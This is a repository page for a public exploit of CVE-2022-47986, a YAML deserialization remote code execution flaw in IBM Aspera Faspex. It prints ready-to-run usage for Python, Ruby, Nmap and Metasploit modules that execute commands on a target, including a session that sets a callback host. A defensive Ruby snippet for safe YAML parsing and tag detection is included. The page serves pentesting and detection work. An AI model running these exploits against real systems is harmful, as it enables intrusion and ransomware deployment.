CVE-2022-47986 PoC — IBM Aspera Faspex Code Issue Vulnerability

Source
Associated Vulnerability
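Title: IBM Aspera Faspex Code Issue Vulnerability (CVE-2022-47986)
Description: IBM Aspera is a fast file transfer and streaming solution from International Business Machines (IBM) of the United States, built on the IBM FASP protocol. IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier contain a code issue vulnerability that stems from a YAML deserialization flaw. An attacker can exploit this vulnerability to execute arbitrary code on the system.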
Description
CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.
Readme
# CVE-2022-47986

## Why

This vulnerability is exploited in the wild.
IceFire uses this vulnerability to deploy ransomware on targeted systems. I would like to help SOC/Blue teams identify impacted systems and Pentesters/Red teams exploit and report it.

## Description

I propose pure Python and Ruby scripts, plus Metasploit and Nmap modules, to exploit the vulnerability, which causes an RCE (Remote Code Execution) on IBM Aspera Faspex through YAML deserialization.
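
The root cause named above is YAML deserialization. As an added example (not code from this repository or from IBM), the Ruby sketch below contrasts tag-honouring loading in Psych with `YAML.safe_load`, and lists `!ruby/` tags from a parse tree so suspicious documents can be flagged without instantiating anything. `RelayJob`, `legacy_load`, `strict_load`, `ruby_tags` and both sample documents are constructed for illustration.

```ruby
require 'yaml'

# Constructed stand-in for an application class; harmless on its own.
class RelayJob
  attr_accessor :target
end

# Constructed sample inputs: one plain document, one carrying a Ruby object tag.
PLAIN_DOC  = "recipient: alice\nfiles:\n  - report.pdf\n"
TAGGED_DOC = "--- !ruby/object:RelayJob\ntarget: example\n"

# Legacy behaviour: tags are honoured and objects are instantiated.
# Psych 4 renamed this to unsafe_load; older versions expose it as load.
def legacy_load(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened parse: only core scalar/collection types, no aliases.
# Returns [:ok, data] or [:rejected, reason] instead of raising.
def strict_load(doc)
  [:ok, YAML.safe_load(doc, permitted_classes: [], aliases: false)]
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError => e
  [:rejected, e.class.name]
end

# Detection helper: walk the parse tree (nothing is instantiated) and
# collect language-specific tags such as !ruby/object:... for alerting.
def ruby_tags(doc)
  tree = YAML.parse(doc)
  return [] unless tree
  tree.each.map { |node| node.respond_to?(:tag) ? node.tag : nil }
      .compact.select { |tag| tag.start_with?('!ruby/') }.uniq
rescue Psych::SyntaxError
  []
end
```

Running `ruby_tags` over captured request bodies or stored YAML gives a cheap signal for review, while `strict_load` is the form to use wherever untrusted YAML must be parsed.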

## Exploit: RCE (Remote Code Execution)

### Python

```bash
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
```

### Ruby

```bash
ruby CVE-2022-47986.rb
ruby CVE-2022-47986.rb <hostname> -c <command>
ruby CVE-2022-47986.rb aspera.faspax.local -c id
```

### Metasploit

```text
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
```

### Nmap

```bash
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
```

## Sources

 - [IBM](https://www.ibm.com/support/pages/node/6952319)
 - [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2022-47986)
 - [Blog - Exploit](https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/)
 - [thehackernews - exploited by icefire](https://thehackernews.com/2023/03/icefire-linux-ransomware.html)
 - [thehackernews - CISA KEV catalog](https://thehackernews.com/2023/02/us-cybersecurity-agency-cisa-adds-three.html)

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
File Snapshot

[4.0K] /data/pocs/8d781d2682735dfb87325cbce200404adb185868
├── [3.8K] CVE-2022-47986.py
├── [4.7K] CVE-2022-47986.rb
├── [5.5K] ibm-aspera-faspex-rce.nse
├── [4.4K] ibm_aspera_faspex_rce_yaml_deserialization.rb
├── [ 34K] LICENSE
└── [1.9K] README.md

0 directories, 6 files